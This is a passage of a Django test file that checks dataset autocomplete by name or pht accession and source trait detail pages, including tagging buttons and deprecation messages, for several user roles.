'a': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefa'],
'abc': ['abcde', 'abcdef', 'abcd_ef', 'abcd123'],
'abcd1': ['abcd123'],
'b': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'bcdefa'],
'abcde': ['abcde', 'abcdef'],
'abcdef': ['abcdef'],
'123': ['abcd123']
}
for dataset_name, pht in zip(self.TEST_NAMES, self.TEST_PHTS):
self.source_datasets.append(factories.SourceDatasetFactory.create(
dataset_name=dataset_name,
i_accession=pht
))
def get_url(self, *args):
return reverse('trait_browser:source:datasets:autocomplete:by-name-or-pht', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
tmp = self.get_url()
response = self.client.get(tmp)
self.assertEqual(response.status_code, 200)
def test_returns_all_datasets_with_no_query(self):
"""Queryset returns all of the datasets with no query."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))
def test_no_deprecated_datasets_in_queryset(self):
"""Queryset returns only the latest version of a dataset."""
models.SourceDataset.objects.all().delete()
dataset_1 = factories.SourceDatasetFactory.create(source_study_version__i_is_deprecated=True)
dataset_2 = factories.SourceDatasetFactory.create(source_study_version__i_is_deprecated=False)
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset_2.pk])
def test_correct_dataset_found_by_name(self):
"""Queryset returns only the correct dataset when found by whole dataset name."""
dataset_name = 'my_unlikely_dataset_name'
dataset = factories.SourceDatasetFactory.create(dataset_name=dataset_name)
url = self.get_url()
response = self.client.get(url, {'q': dataset_name})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset.i_id])
def test_correct_dataset_found_by_case_insensitive_name(self):
"""Queryset returns only the correct source dataset when found by whole name, with mismatched case."""
dataset_name = 'my_unlikely_dataset_name'
dataset = factories.SourceDatasetFactory.create(dataset_name=dataset_name)
url = self.get_url()
response = self.client.get(url, {'q': dataset_name.upper()})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset.i_id])
def test_name_test_queries(self):
"""Returns only the correct source dataset for each of the TEST_NAME_QUERIES."""
url = self.get_url()
for query in self.TEST_NAME_QUERIES.keys():
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_NAME_QUERIES[query]
self.assertEqual(len(returned_pks), len(expected_matches),
msg='Did not find correct number of matches for query {}'.format(query))
# Make sure the matches found are those that are expected.
for expected_name in expected_matches:
name_queryset = models.SourceDataset.objects.filter(dataset_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg='Could not find expected dataset name {} with query {}'.format(expected_name, query))
def test_pht_test_queries_without_pht_in_string(self):
"""Returns only the correct datasets for each of the TEST_PHT_QUERIES when 'pht' is not in query string."""
url = self.get_url()
for query in self.TEST_PHT_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHT_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_pht in expected_matches:
expected_pk = models.SourceDataset.objects.get(i_accession=expected_pht).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_pht, query))
def test_pht_test_queries_with_pht_in_string(self):
"""Returns only the correct source datasets for each of the TEST_PHT_QUERIES when 'pht' is in query string."""
url = self.get_url()
for query in self.TEST_PHT_QUERIES:
response = self.client.get(url, {'q': 'pht' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHT_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_pht in expected_matches:
expected_pk = models.SourceDataset.objects.get(i_accession=expected_pht).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_pht, query))
def test_correct_dataset_found_with_pht_in_name(self):
"""Queryset returns both datasets when one has dataset name of phtNNN and the other has pht NNN."""
models.SourceTrait.objects.all().delete()
name_trait = factories.SourceDatasetFactory.create(dataset_name='pht557')
pht_trait = factories.SourceDatasetFactory.create(i_accession=557)
url = self.get_url()
response = self.client.get(url, {'q': 'pht557'})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), 2)
self.assertIn(name_trait.pk, returned_pks)
self.assertIn(pht_trait.pk, returned_pks)
def test_dataset_found_when_querying_number_in_name(self):
"""Queryset returns both datasets when one has dataset name of NNN and the other has pht NNN."""
models.SourceTrait.objects.all().delete()
# Use a different study to ensure that one of the pre-created datasets doesn't match.
dataset_name = 'unlikely_24601_dataset'
# Use an accession that won't match for one dataset but not the other
dataset_name_match = factories.SourceDatasetFactory.create(dataset_name=dataset_name, i_accession=123456)
dataset_accession_match = factories.SourceDatasetFactory.create(dataset_name='other_name', i_accession=24601)
url = self.get_url()
response = self.client.get(url, {'q': 246})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted(returned_pks), sorted([dataset_name_match.i_id, dataset_accession_match.i_id]))
class StudySourceDatasetNameOrPHTAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(StudySourceDatasetNameOrPHTAutocompleteTest, self).setUp()
self.study = factories.StudyFactory.create()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_datasets = []
self.TEST_PHTS = (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, )
self.TEST_NAMES = ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'cdefgh', 'bcdefa',
'other1', 'other2', 'other3']
self.TEST_PHT_QUERIES = {
'5': (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, ),
'05': (),
'0005': (500, 555, 520, ),
'000005': (5, ),
'52': (52, 520, 5200, ),
'052': (),
'0052': (5200, ),
'00052': (520, ),
'555555': (555555, ),
'0': (5, 50, 500, 55, 555, 52, 520, 5200, ),
}
self.TEST_NAME_QUERIES = {
'a': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefa'],
'abc': ['abcde', 'abcdef', 'abcd_ef', 'abcd123'],
'abcd1': ['abcd123'],
'b': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'bcdefa'],
'abcde': ['abcde', 'abcdef'],
'abcdef': ['abcdef'],
'123': ['abcd123']
}
for dataset_name, pht in zip(self.TEST_NAMES, self.TEST_PHTS):
self.source_datasets.append(factories.SourceDatasetFactory.create(
source_study_version=self.source_study_version,
dataset_name=dataset_name,
i_accession=pht
))
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:datasets:autocomplete:by-name-or-pht', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
tmp = self.get_url(self.study.pk)
response = self.client.get(tmp)
self.assertEqual(response.status_code, 200)
def test_returns_all_datasets_with_no_query(self):
"""Queryset returns all of the datasets with no query."""
url = self.get_url(self.study.pk)
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))
def test_no_deprecated_datasets_in_queryset(self):
"""Queryset returns only the latest version of a dataset."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source datasets and increment their versions. Link it to the new ssv.
datasets2 = []
for dataset in self.source_datasets:
d2 = copy(dataset)
d2.source_study_version = source_study_version2
d2.i_id = dataset.i_id + len(self.source_datasets)
d2.save()
datasets2.append(d2)
# Get results from the autocomplete view and make sure only the new versions are found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(datasets2))
for dataset in datasets2:
self.assertIn(dataset.i_id, returned_pks)
for dataset in self.source_datasets:
self.assertNotIn(dataset.i_id, returned_pks)
def test_other_study_not_in_queryset(self):
"""Queryset returns only datasets belonging to the appropriate study."""
# Delete all but five source datasets, so that there are 5 from each study.
study2 = factories.StudyFactory.create()
datasets2 = factories.SourceDatasetFactory.create_batch(
5, source_study_version__study=study2)
# Get results from the autocomplete view and make sure only datasets from the correct study are found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that the other study's datasets do not show up.
self.assertEqual(len(returned_pks), len(self.source_datasets))
for dataset in datasets2:
self.assertNotIn(dataset.i_id, returned_pks)
for dataset in self.source_datasets:
self.assertIn(dataset.i_id, returned_pks)
def test_correct_dataset_found_by_name(self):
"""Queryset returns only the correct dataset when found by whole dataset name."""
dataset_name = 'my_unlikely_dataset_name'
dataset = factories.SourceDatasetFactory.create(
dataset_name=dataset_name,
source_study_version=self.source_study_version
)
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': dataset_name})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset.i_id])
def test_correct_dataset_found_by_case_insensitive_name(self):
"""Queryset returns only the correct source dataset when found by whole name, with mismatched case."""
dataset_name = 'my_unlikely_dataset_name'
dataset = factories.SourceDatasetFactory.create(
dataset_name=dataset_name,
source_study_version=self.source_study_version
)
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': dataset_name.upper()})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset.i_id])
def test_name_test_queries(self):
"""Returns only the correct source dataset for each of the TEST_NAME_QUERIES."""
url = self.get_url(self.study.pk)
for query in self.TEST_NAME_QUERIES.keys():
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_NAME_QUERIES[query]
self.assertEqual(len(returned_pks), len(expected_matches),
msg='Did not find correct number of matches for query {}'.format(query))
# Make sure the matches found are those that are expected.
for expected_name in expected_matches:
name_queryset = models.SourceDataset.objects.filter(dataset_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg='Could not find expected dataset name {} with query {}'.format(expected_name, query))
def test_pht_test_queries_without_pht_in_string(self):
"""Returns only the correct datasets for each of the TEST_PHT_QUERIES when 'pht' is not in query string."""
url = self.get_url(self.study.pk)
for query in self.TEST_PHT_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHT_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_pht in expected_matches:
expected_pk = models.SourceDataset.objects.get(i_accession=expected_pht).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_pht, query))
def test_pht_test_queries_with_pht_in_string(self):
"""Returns only the correct source datasets for each of the TEST_PHT_QUERIES when 'pht' is in query string."""
url = self.get_url(self.study.pk)
for query in self.TEST_PHT_QUERIES:
response = self.client.get(url, {'q': 'pht' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHT_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_pht in expected_matches:
expected_pk = models.SourceDataset.objects.get(i_accession=expected_pht).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_pht, query))
def test_correct_dataset_found_with_pht_in_name(self):
"""Queryset returns both datasets when one has dataset name of phtNNN and the other has pht NNN."""
models.SourceTrait.objects.all().delete()
name_trait = factories.SourceDatasetFactory.create(
dataset_name='pht557',
source_study_version=self.source_study_version
)
pht_trait = factories.SourceDatasetFactory.create(
i_accession=557,
source_study_version=self.source_study_version
)
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': 'pht557'})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), 2)
self.assertIn(name_trait.pk, returned_pks)
self.assertIn(pht_trait.pk, returned_pks)
def test_dataset_found_when_querying_number_in_name(self):
"""Queryset returns both datasets when one has dataset name of NNN and the other has pht NNN."""
models.SourceTrait.objects.all().delete()
# Use a different study to ensure that one of the pre-created datasets doesn't match.
dataset_name = 'unlikely_24601_dataset'
# Use an accession that won't match for one dataset but not the other
dataset_name_match = factories.SourceDatasetFactory.create(
dataset_name=dataset_name,
i_accession=123456,
source_study_version=self.source_study_version
)
dataset_accession_match = factories.SourceDatasetFactory.create(
dataset_name='other_name',
i_accession=24601,
source_study_version=self.source_study_version
)
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': 246})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted(returned_pks), sorted([dataset_name_match.i_id, dataset_accession_match.i_id]))
class SourceTraitDetailTest(UserLoginTestCase):
def setUp(self):
super(SourceTraitDetailTest, self).setUp()
self.trait = factories.SourceTraitFactory.create()
def get_url(self, *args):
return reverse('trait_browser:source:traits:detail', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.trait.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data(self):
"""View has appropriate data in the context."""
tagged_traits = TaggedTraitFactory.create_batch(2, trait=self.trait)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertIn('source_trait', context)
self.assertEqual(context['source_trait'], self.trait)
self.assertIn('tagged_traits_with_xs', context)
self.assertEqual([el[0] for el in context['tagged_traits_with_xs']],
list(self.trait.all_taggedtraits.non_archived()))
self.assertIn('user_is_study_tagger', context)
self.assertFalse(context['user_is_study_tagger'])
self.assertIn('is_deprecated', context)
self.assertIn('show_removed_text', context)
self.assertIn('new_version_link', context)
def test_context_deprecated_trait_with_no_newer_version(self):
"""View has appropriate deprecation message with no newer version."""
source_study_version1 = self.trait.source_dataset.source_study_version
source_study_version1.i_is_deprecated = True
source_study_version1.save()
source_study_version2 = factories.SourceStudyVersionFactory.create(
study=source_study_version1.study,
i_is_deprecated=False,
i_version=source_study_version1.i_version + 1
)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertTrue(context['is_deprecated'])
self.assertTrue(context['show_removed_text'])
self.assertIsNone(context['new_version_link'])
self.assertContains(response, '<div class="alert alert-danger" role="alert" id="removed_deprecated_trait">')
self.assertNotContains(response, '<div class="alert alert-danger" role="alert" id="updated_deprecated_trait">')
def test_context_deprecated_trait_with_new_version(self):
"""View has appropriate deprecation message with a newer version."""
study = factories.StudyFactory.create()
source_study_version1 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=True, i_version=1)
source_study_version2 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=False, i_version=2)
source_dataset1 = factories.SourceDatasetFactory.create(source_study_version=source_study_version1)
source_dataset2 = factories.SourceDatasetFactory.create(
source_study_version=source_study_version2,
i_accession=source_dataset1.i_accession,
i_version=source_dataset1.i_version,
i_is_subject_file=source_dataset1.i_is_subject_file,
i_study_subject_column=source_dataset1.i_study_subject_column,
i_dbgap_description=source_dataset1.i_dbgap_description
)
trait1 = factories.SourceTraitFactory.create(source_dataset=source_dataset1)
trait2 = factories.SourceTraitFactory.create(
source_dataset=source_dataset2,
i_detected_type=trait1.i_detected_type,
i_dbgap_type=trait1.i_dbgap_type,
i_dbgap_variable_accession=trait1.i_dbgap_variable_accession,
i_dbgap_variable_version=trait1.i_dbgap_variable_version,
i_dbgap_comment=trait1.i_dbgap_comment,
i_dbgap_unit=trait1.i_dbgap_unit,
i_n_records=trait1.i_n_records,
i_n_missing=trait1.i_n_missing,
i_is_unique_key=trait1.i_is_unique_key,
i_are_values_truncated=trait1.i_are_values_truncated
)
response = self.client.get(self.get_url(trait1.pk))
context = response.context
self.assertTrue(context['is_deprecated'])
self.assertFalse(context['show_removed_text'])
self.assertEqual(context['new_version_link'], trait2.get_absolute_url())
self.assertContains(response, context['new_version_link'])
self.assertNotContains(response, '<div class="alert alert-danger" role="alert" id="removed_deprecated_trait">')
self.assertContains(response, '<div class="alert alert-danger" role="alert" id="updated_deprecated_trait">')
def test_context_deprecated_trait_with_two_new_versions(self):
"""View has appropriate deprecation message with a newer version."""
study = factories.StudyFactory.create()
source_study_version1 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=True, i_version=1)
source_study_version2 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=True, i_version=2)
source_study_version3 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=False, i_version=3)
source_dataset1 = factories.SourceDatasetFactory.create(source_study_version=source_study_version1)
source_dataset2 = factories.SourceDatasetFactory.create(
source_study_version=source_study_version2,
i_accession=source_dataset1.i_accession,
i_version=source_dataset1.i_version,
i_is_subject_file=source_dataset1.i_is_subject_file,
i_study_subject_column=source_dataset1.i_study_subject_column,
i_dbgap_description=source_dataset1.i_dbgap_description
)
source_dataset3 = factories.SourceDatasetFactory.create(
source_study_version=source_study_version3,
i_accession=source_dataset1.i_accession,
i_version=source_dataset1.i_version,
i_is_subject_file=source_dataset1.i_is_subject_file,
i_study_subject_column=source_dataset1.i_study_subject_column,
i_dbgap_description=source_dataset1.i_dbgap_description
)
trait1 = factories.SourceTraitFactory.create(source_dataset=source_dataset1)
trait2 = factories.SourceTraitFactory.create(
source_dataset=source_dataset2,
i_detected_type=trait1.i_detected_type,
i_dbgap_type=trait1.i_dbgap_type,
i_dbgap_variable_accession=trait1.i_dbgap_variable_accession,
i_dbgap_variable_version=trait1.i_dbgap_variable_version,
i_dbgap_comment=trait1.i_dbgap_comment,
i_dbgap_unit=trait1.i_dbgap_unit,
i_n_records=trait1.i_n_records,
i_n_missing=trait1.i_n_missing,
i_is_unique_key=trait1.i_is_unique_key,
i_are_values_truncated=trait1.i_are_values_truncated
)
trait3 = factories.SourceTraitFactory.create(
source_dataset=source_dataset3,
i_detected_type=trait1.i_detected_type,
i_dbgap_type=trait1.i_dbgap_type,
i_dbgap_variable_accession=trait1.i_dbgap_variable_accession,
i_dbgap_variable_version=trait1.i_dbgap_variable_version,
i_dbgap_comment=trait1.i_dbgap_comment,
i_dbgap_unit=trait1.i_dbgap_unit,
i_n_records=trait1.i_n_records,
i_n_missing=trait1.i_n_missing,
i_is_unique_key=trait1.i_is_unique_key,
i_are_values_truncated=trait1.i_are_values_truncated
)
response = self.client.get(self.get_url(trait1.pk))
context = response.context
self.assertTrue(context['is_deprecated'])
self.assertFalse(context['show_removed_text'])
self.assertEqual(context['new_version_link'], trait3.get_absolute_url())
self.assertContains(response, context['new_version_link'])
self.assertNotContains(response, '<div class="alert alert-danger" role="alert" id="removed_deprecated_trait">')
self.assertContains(response, '<div class="alert alert-danger" role="alert" id="updated_deprecated_trait">')
def test_no_tagged_trait_remove_button(self):
"""The tag removal button shows up."""
tagged_traits = TaggedTraitFactory.create_batch(3, trait=self.trait)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
self.assertFalse(b)
for tt in tagged_traits:
self.assertNotContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tt.pk}))
def test_has_no_archived_tagged_traits(self):
"""An archived tagged trait is not included in the context."""
tagged_traits = TaggedTraitFactory.create_batch(2, trait=self.trait)
archived_tagged_trait = TaggedTraitFactory.create(trait=self.trait, archived=True)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertEqual([el[0] for el in context['tagged_traits_with_xs']],
list(self.trait.all_taggedtraits.non_archived()))
self.assertNotIn(archived_tagged_trait, [el[0] for el in context['tagged_traits_with_xs']])
def test_no_tagging_button(self):
"""Regular user does not see a button to add tags on this detail page."""
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertNotContains(response, reverse('trait_browser:source:traits:tagging', kwargs={'pk': self.trait.pk}))
self.assertFalse(context['show_tag_button'])
class SourceTraitDetailPhenotypeTaggerTest(PhenotypeTaggerLoginTestCase):
def setUp(self):
super(SourceTraitDetailPhenotypeTaggerTest, self).setUp()
self.trait = factories.SourceTraitFactory.create(source_dataset__source_study_version__study=self.study)
self.tag = TagFactory.create()
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:traits:detail', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 200)
def test_has_one_tagged_trait(self):
"""The correct TaggedTrait is in the context."""
tagged_trait = TaggedTrait.objects.create(tag=self.tag, trait=self.trait, creator=self.user)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertEqual(context['tagged_traits_with_xs'][0][0], tagged_trait)
def test_has_tagged_traits(self):
"""The correct TaggedTraits are in the context."""
tagged_traits = TaggedTraitFactory.create_batch(2, trait=self.trait)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertEqual([el[0] for el in context['tagged_traits_with_xs']],
list(self.trait.all_taggedtraits.non_archived()))
def test_has_no_archived_tagged_traits(self):
"""An archived tagged trait is not included in the context."""
tagged_traits = TaggedTraitFactory.create_batch(2, trait=self.trait)
archived_tagged_trait = TaggedTraitFactory.create(trait=self.trait, archived=True)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertEqual([el[0] for el in context['tagged_traits_with_xs']],
list(self.trait.all_taggedtraits.non_archived()))
self.assertNotIn(archived_tagged_trait, [el[0] for el in context['tagged_traits_with_xs']])
def test_has_tagged_trait_remove_buttons(self):
"""The tag removal buttons shows up."""
tagged_traits = TaggedTraitFactory.create_batch(2, trait=self.trait)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
self.assertTrue(b)
for tt in tagged_traits:
self.assertContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tt.pk}))
def test_no_tagged_trait_remove_buttons_if_reviewed(self):
"""The tag removal button does not show up for reviewed tagged traits that need followup."""
tagged_traits = TaggedTraitFactory.create_batch(3, trait=self.trait)
dcc_review = DCCReviewFactory.create(tagged_trait=tagged_traits[0], status=DCCReview.STATUS_FOLLOWUP)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
if a == dcc_review.tagged_trait:
self.assertFalse(b)
else:
self.assertTrue(b)
self.assertNotContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tagged_traits[0].pk}))
self.assertContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tagged_traits[1].pk}))
def test_no_tagged_trait_remove_buttons_if_confirmed(self):
"""The tag removal button does not show up for confirmed tagged traits."""
tagged_traits = TaggedTraitFactory.create_batch(3, trait=self.trait)
dcc_review = DCCReviewFactory.create(tagged_trait=tagged_traits[0], status=DCCReview.STATUS_CONFIRMED)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
if a == dcc_review.tagged_trait:
self.assertFalse(b)
else:
self.assertTrue(b)
self.assertNotContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tagged_traits[0].pk}))
self.assertContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tagged_traits[1].pk}))
def test_no_tagged_trait_remove_button_for_other_study(self):
"""The tag removal button does not show up for a trait from another study."""
other_trait = factories.SourceTraitFactory.create()
tagged_trait = TaggedTrait.objects.create(tag=self.tag, trait=other_trait, creator=self.user)
response = self.client.get(self.get_url(other_trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
self.assertFalse(b)
self.assertNotContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': self.tag.pk}))
def test_no_tagged_trait_remove_button_if_deprecated(self):
study_version = self.trait.source_dataset.source_study_version
study_version.i_is_deprecated = True
study_version.save()
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
self.assertFalse(b)
self.assertNotContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': self.tag.pk}))
def test_has_tagging_button(self):
"""A phenotype tagger does see a button to add tags on this detail page."""
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertTrue(context['show_tag_button'])
self.assertContains(response, reverse('trait_browser:source:traits:tagging', kwargs={'pk': self.trait.pk}))
def test_no_tagging_button_if_deprecated(self):
"""A phenotype tagger doesn't see a button to add tags if the trait is deprecated."""
study_version = self.trait.source_dataset.source_study_version
study_version.i_is_deprecated = True
study_version.save()
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertFalse(context['show_tag_button'])
self.assertNotContains(response, reverse('trait_browser:source:traits:tagging', kwargs={'pk': self.trait.pk}))
def test_user_is_study_tagger_true(self):
"""user_is_study_tagger is true in the view's context."""
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertTrue(context['user_is_study_tagger'])
class SourceTraitDetailDCCAnalystTest(DCCAnalystLoginTestCase):
def setUp(self):
super(SourceTraitDetailDCCAnalystTest, self).setUp()
self.study = factories.StudyFactory.create()
self.trait = factories.SourceTraitFactory.create(source_dataset__source_study_version__study=self.study)
self.tag = TagFactory.create()
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:traits:detail', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 200)
def test_has_one_tagged_trait(self):
"""The correct TaggedTrait is in the context."""
tagged_trait = TaggedTrait.objects.create(tag=self.tag, trait=self.trait, creator=self.user)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertEqual(context['tagged_traits_with_xs'][0][0], tagged_trait)
def test_has_tagged_traits(self):
"""The correct TaggedTraits are in the context."""
tagged_traits = TaggedTraitFactory.create_batch(2, trait=self.trait)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertEqual([el[0] for el in context['tagged_traits_with_xs']],
list(self.trait.all_taggedtraits.non_archived()))
def test_has_no_archived_tagged_traits(self):
"""An archived tagged trait is not included in the context."""
tagged_traits = TaggedTraitFactory.create_batch(2, trait=self.trait)
archived_tagged_trait = TaggedTraitFactory.create(trait=self.trait, archived=True)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertEqual([el[0] for el in context['tagged_traits_with_xs']],
list(self.trait.all_taggedtraits.non_archived()))
self.assertNotIn(archived_tagged_trait, [el[0] for el in context['tagged_traits_with_xs']])
def test_has_tagged_trait_remove_buttons(self):
"""The tag removal buttons shows up."""
tagged_traits = TaggedTraitFactory.create_batch(2, trait=self.trait)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
self.assertTrue(b)
for tt in tagged_traits:
self.assertContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tt.pk}))
def test_no_tagged_trait_remove_buttons_if_reviewed(self):
"""The tag removal button does not show up for reviewed tagged traits that need followup."""
tagged_traits = TaggedTraitFactory.create_batch(3, trait=self.trait)
dcc_review = DCCReviewFactory.create(
tagged_trait=tagged_traits[0], status=DCCReview.STATUS_FOLLOWUP)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
if a == dcc_review.tagged_trait:
self.assertFalse(b)
else:
self.assertTrue(b)
self.assertNotContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tagged_traits[0].pk}))
self.assertContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tagged_traits[1].pk}))
def test_no_tagged_trait_remove_buttons_if_confirmed(self):
"""The tag removal button does not show up for confirmed tagged traits."""
tagged_traits = TaggedTraitFactory.create_batch(3, trait=self.trait)
dcc_review = DCCReviewFactory.create(
tagged_trait=tagged_traits[0], status=DCCReview.STATUS_CONFIRMED)
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
if a == dcc_review.tagged_trait:
self.assertFalse(b)
else:
self.assertTrue(b)
self.assertNotContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tagged_traits[0].pk}))
self.assertContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': tagged_traits[1].pk}))
def test_no_tagged_trait_remove_button_if_deprecated(self):
study_version = self.trait.source_dataset.source_study_version
study_version.i_is_deprecated = True
study_version.save()
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
for (a, b) in context['tagged_traits_with_xs']:
self.assertFalse(b)
self.assertNotContains(response, reverse('tags:tagged-traits:pk:delete', kwargs={'pk': self.tag.pk}))
def test_has_tagging_button(self):
"""A DCC analyst does see a button to add tags on this detail page."""
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertTrue(context['show_tag_button'])
self.assertContains(response, reverse('trait_browser:source:traits:tagging', kwargs={'pk': self.trait.pk}))
def test_no_tagging_button_if_deprecated(self):
"""A phenotype tagger doesn't see a button to add tags if the trait is deprecated."""
study_version = self.trait.source_dataset.source_study_version
study_version.i_is_deprecated = True
study_version.save()
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertFalse(context['show_tag_button'])
self.assertNotContains(response, reverse('trait_browser:source:traits:tagging', kwargs={'pk': self.trait.pk}))
def test_user_is_study_tagger_false(self):
"""user_is_study_tagger is false in the view's context."""
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
